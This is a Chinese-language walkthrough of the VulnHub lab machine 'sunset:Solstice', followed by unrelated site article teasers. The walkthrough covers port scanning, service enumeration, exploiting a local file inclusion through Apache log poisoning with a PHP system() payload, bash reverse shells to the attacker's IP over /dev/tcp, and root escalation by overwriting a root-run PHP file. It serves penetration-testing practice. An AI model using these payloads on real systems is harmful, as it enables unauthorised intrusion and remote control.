sunset:Solstice靶场

sunset:Solstice

https://www.vulnhub.com/entry/sunset-solstice,499/

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.244

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.244

1. FTP服务分析(21/tcp, 2121/tcp, 62524/tcp)

pyftpdlib 1.5.6 (21/tcp, 2121/tcp):

  • 匿名登录允许(2121端口):尝试登录 ftp://192.168.23.244:2121 用户名为 anonymous,空密码。
  • 检查 pub 目录:ls -al 查看权限和文件。若可写,可上传反向Shell或测试文件。
  • 搜索漏洞:pyftpdlib 1.5.6 是否存在已知漏洞(如CVE-2021-30800)。

FreeFloat ftpd 1.00 (62524/tcp):

  • 旧版本,可能存在缓冲区溢出漏洞(如CVE-2010-4221)。使用 searchsploit freefloat 查找EXP。

2. SSH服务分析(22/tcp)

OpenSSH 7.9p1:

  • 检查版本是否有已知漏洞(如CVE-2021-41617),但该版本较新,可能已修复。
  • 若获取凭证,可尝试登录。或通过其他服务(如FTP/SMB)泄露的凭证进行爆破。

3. SMTP服务分析(25/tcp)

Exim smtpd:

  • 使用 smtp-user-enum 或手动命令枚举用户:
    telnet 192.168.23.244 25
    VRFY root     
    # 测试是否存在用户
  • 检查CVE-2019-15846(Exim 4.92.1以下远程代码执行),但需确认版本是否受影响。

4. HTTP服务分析(80/tcp, 8593/tcp, 54787/tcp)

Apache 2.4.38 (80/tcp):

  • 访问 http://192.168.23.244,检查页面内容
  • 使用目录枚举工具:
    gobuster dir -u
    http://192.168.23.244 -w /usr/share/wordlists/dirbuster/common.txt

PHP cli服务器 (8593/tcp, 54787/tcp):

  • 访问 http://192.168.23.244:8593 和 http://192.168.23.244:54787,检查应用功能
  • 检查PHP版本漏洞(7.3.14),如反序列化、文件包含(?page=../../etc/passwd)。

5. SMB服务分析(139/tcp, 445/tcp)

Samba 4.9.5-Debian:

  • 枚举共享和用户:
    smbclient -L 192.168.23.244 -N
    enum4linux -a 192.168.23.244
  • 检查匿名访问共享:
    smbclient
    \\\\192.168.23.244\\[sharename] -N
  • 测试CVE-2017-7494(Samba远程代码执行),但需配置允许写入共享。

6. Squid代理分析(3128/tcp)

Squid 4.6:

  • 测试代理是否开放:
    curl -x
    http://192.168.23.244:3128 Example Domain
  • 若可用,用于扫描内网或访问受限资源。

 

421端口的ftp服务器登录失败,登录2121端口的ftp服务器成功

ftp 192.168.23.244

ftp 192.168.23.244 2121

再看看web服务的几个端口

http://192.168.23.244/

http://192.168.23.244:8593/

http://192.168.23.244:54787/

5,经过测试这个网站存在本地文件包含漏洞

http://192.168.23.244:8593/index.php?book=../../../../../../etc/passwd

那么就需要把这个本地文件包含漏洞利用起来,然后getshell。正好能够包含

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log

使用nc污染日志

echo -e "GET / HTTP/1.1\r\nHost: 192.168.23.244\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.23.244 80

访问文件包含网页确定漏洞是否利用成功

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=id

漏洞利用成功,成功执行了系统命令,接下来构造命令反弹shell(需要URL编码)

bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%27exec%20bash%20-i%20%26%3E/dev/tcp/192.168.23.182/4444%20%3C%261%27%0A

使用kali接收来自靶机的shell

6,信息收集一下

uname -a

cat /etc/*-release

getconf LONG_BIT

搜索一下root用户可读可写的可执行文件

find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"

查看一下这个文件

cat /var/tmp/sv/index.php

查看一下进程

ps -ef | grep "/var/tmp/sv"

发现有一个进程使用php解释器执行/var/tmp/sv,使用ehco写入木马构造恶意php文件

echo "<?php" > /var/tmp/sv/index.php && echo "echo \"Under construction\";" >> /var/tmp/sv/index.php && echo "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.182/8888 0>&1'\");" >> /var/tmp/sv/index.php && echo "?>" >> /var/tmp/sv/index.php

cat /var/tmp/sv/index.php

靶机上通过nc访问运行这个进程的57端口,并请求/index.php文件

cd /tmp

curl localhost:57

然后kali开启对8888端口的监听

nc -lvvp 8888

成功提权成为root用户,拿到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/80341.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

AZScreenRecorder最新版:功能强大、操作简便的手机录屏软件

AZScreenRecorder最新版是一款功能强大的手机录屏软件&#xff0c;专为安卓设备设计。它无需ROOT权限&#xff0c;支持无限录制时长&#xff0c;操作简单&#xff0c;录制过程中可以随时暂停&#xff0c;满足不同用户的个性化录屏需求。此外&#xff0c;用户还可以自定义分辨率…

模块自动导入的小工具

import { ref, reactive, onMounted } from vue import { useRoute, useRouter } from vue-router项目里很多文件都需要引入这些公共库&#xff0c;比较繁琐&#xff0c;使用一个小工具可以自动导入&#xff0c;就不需要在每个文件里面都写这些导入的代码了。 通过命令行下载安…

【读书笔记】《编码:隐匿在计算机软硬件背后的语言》01 逻辑与开关

【读书笔记】《编码&#xff1a;隐匿在计算机软硬件背后的语言》01 逻辑与开关 前言01 逻辑与开关 前言 我是一名光学工程专业研二的学生&#xff0c;目前正处于找工作的阶段&#xff0c;根据往年师兄师姐找工作的情况&#xff0c;在西安这个城市不出意外我能找到的应该就是嵌入…

TXT编码转换工具iconv

iconv.exe是实现TXT编码转换的命令行工具&#xff0c;支持几百种编码格式的转换&#xff0c;利用它可以在自主开发程序上实现TXT文档编码的自动转换。 一、命令参数格式 Usage: iconv [-c] [-s] [-f fromcode] [-t tocode] [file ...] or: iconv -l 二、转换的示例 将UTF-8…

软考中级数据库备考-上午篇

背景 新工作主要做大数据平台&#xff0c;考一个软考中级数据库系统工程师&#xff0c;补足一下基础知识。 基础知识 1.计算机硬件基础知识 正确答案:C 正确答案:D 正确答案:C 正确答案&#xff1a;BC 正确答案&#xff1a;B 正确答案:D 正确答案:A DMA建立内存与外设的直接…

AtCoder AT_abc405_d ABC405D - Escape Route

前言 BFS 算法在 AtCoder 比赛中还是会考的&#xff0c;因为不常练习导致没想到&#xff0c;不仅错误 TLE 了很多&#xff0c;还影响了心态&#xff0c;3 发罚时后才 AC。 思路 首先&#xff0c;我们把所有位置和出口的距离算出来&#xff08;用 BFS&#xff09;&#xff0c…

【计算机视觉】目标检测:yoloV1~yoloV11项目论文及对比

以下是 YOLO (You Only Look Once) 系列模型从 V1 到 V11 的详细介绍和项目地址&#xff08;截至2024年7月&#xff09;。YOLO 是目标检测领域的里程碑模型&#xff0c;以其 实时性 和 高精度 著称&#xff0c;广泛应用于自动驾驶、安防监控、工业检测等领域。 YOLOv1 (2016) …

推荐系统架构设计

1.分析用户行为数据​&#xff1a;​ 收集用户的活跃时间、点击行为、浏览历史等数据。​分析用户的活跃模式&#xff0c;确定用户最活跃的时间段。​kafka flink 数据库 分析用户行为并存储 2. 预生成推荐内容​&#xff1a;​ 在用户活跃时间之前&#xff0c;预先生成推荐…

BERT类模型

1. BERT类模型是否需要处理 [CLS] 或池化&#xff1f; 那首先搞懂 [CLS] 和池化 &#xff08;1&#xff09;[CLS] 的作用 BERT 的输入格式中&#xff0c;每个序列的开头会添加一个特殊的 [CLS] Token&#xff08;Classification Token&#xff09;。它的设计初衷是为分类任务…

我的世界云端服务器具体是指什么?

我的世界云端服务器是指一种基于互联网的多人游戏服务器&#xff0c;将游戏服务器运行在云平台上&#xff0c;而不是在本地计算机中&#xff0c;这使用户不需要考虑自身电脑的性能和网络稳定性&#xff0c;只需要通过网络连接到云端服务器&#xff0c;就可以享受到顺畅的游戏体…

软考(信息系统运行管理员)

第一章 信息系统运维概述 1.1 信息系统概述 信息的含义和类型 信息的含义&#xff1a; 一般&#xff1a;人们关心的事情的消息或知识。香农&#xff08;信息论创始人&#xff09;&#xff1a;用来减少随机不确定性的东西&#xff08;标志着信息科学进入定量研究阶段&#xff…

Unity基础学习(九)输入系统全解析:鼠标、键盘与轴控制

目录 一、Input类 1. 鼠标输入 2. 键盘输入 3. 默认轴输入 &#xff08;1&#xff09; 基础参数 &#xff08;2&#xff09;按键绑定参数 &#xff08;3&#xff09;输入响应参数 &#xff08;4&#xff09;输入类型与设备参数 &#xff08;5&#xff09;不同类型轴的参…

VBA将PDF文档内容逐行写入Excel

VBA是无法直接读取PDF文档的&#xff0c;但结合上期我给大家介绍了PDF转换工具xpdf-tools-4.05&#xff0c;先利用它将PDF文档转换为TXT文档&#xff0c;然后再将TXT的内容写入Excel&#xff0c;这样就间接实现了将PDF文档的内容导入Excel的操作。下面的代码将向大家演示如何实…

Spring Boot之MCP Client开发全介绍

Spring AI MCP(模型上下文协议,Model Context Protocol)客户端启动器为 Spring Boot 应用程序中的 MCP 客户端功能提供了自动配置支持。它支持同步和异步两种客户端实现方式,并提供了多种传输选项。 MCP 客户端启动器提供以下功能: 多客户端实例管理 支持管理多个客户端实…

[题解]2023CCPC黑龙江省赛 - Folder

来源&#xff1a;F.Folder - Codeforces题意&#xff1a;给定由 n ( 1 ≤ n ≤ 1 0 5 ) n(1\le n\le 10^5) n(1≤n≤105)个结点组成的树&#xff0c;每次操作可将一棵子树接到其他结点上。求将树转换为一棵斜树的最小操作次数。关键词&#xff1a;思维(签到)题解&#xff1a;斜…

string[字符串中第一个的唯一字符][蓝桥杯]

使用哈希表解决 class Solution { public:int firstUniqChar(string s) {int arr[26];for(int i0;i<s.size();i){arr[s[i]-a];}for(int i0;i<s.size();i){if(arr[s[i]-a]1)return i;}return -1;} };

【深度学习-Day 8】让数据说话:Python 可视化双雄 Matplotlib 与 Seaborn 教程

Langchain系列文章目录 01-玩转LangChain&#xff1a;从模型调用到Prompt模板与输出解析的完整指南 02-玩转 LangChain Memory 模块&#xff1a;四种记忆类型详解及应用场景全覆盖 03-全面掌握 LangChain&#xff1a;从核心链条构建到动态任务分配的实战指南 04-玩转 LangChai…

Flink 实时数据一致性与 Exactly-Once 语义保障实战

在构建企业级实时数仓的过程中,“数据一致性” 是保障指标准确性的核心能力,尤其是在金融、电商、医疗等对数据敏感度极高的场景中。Flink 作为流批一体的实时计算引擎,其内建的 Exactly-Once 语义为我们提供了强有力的保障机制。本篇将围绕如何实现端到端的数据一致性、如何…

傅利叶十周年,升级核心战略:“有温度”的具身智能蓝图

5月9日&#xff0c;傅利叶十周年庆典暨首届具身智能生态峰会在上海正式召开。本次大会以“十年共创&#xff0c;具身成翼”为主题&#xff0c;汇聚了来自通用机器人与医疗康复领域的顶尖专家学者、合作伙伴与投资机构&#xff0c;共同探索具身智能在未来十年的技术应用与生态发…

Docker中mysql镜像保存与导入

一、Docker中mysql镜像保存 Docker 的 MySQL 镜像保存通常有两种场景&#xff1a;一种是保存镜像本身的修改&#xff08;如配置、初始化数据&#xff09;&#xff0c;另一种是持久化保存容器运行时产生的数据&#xff08;如数据库表、用户数据&#xff09;。以下是具体方法&am…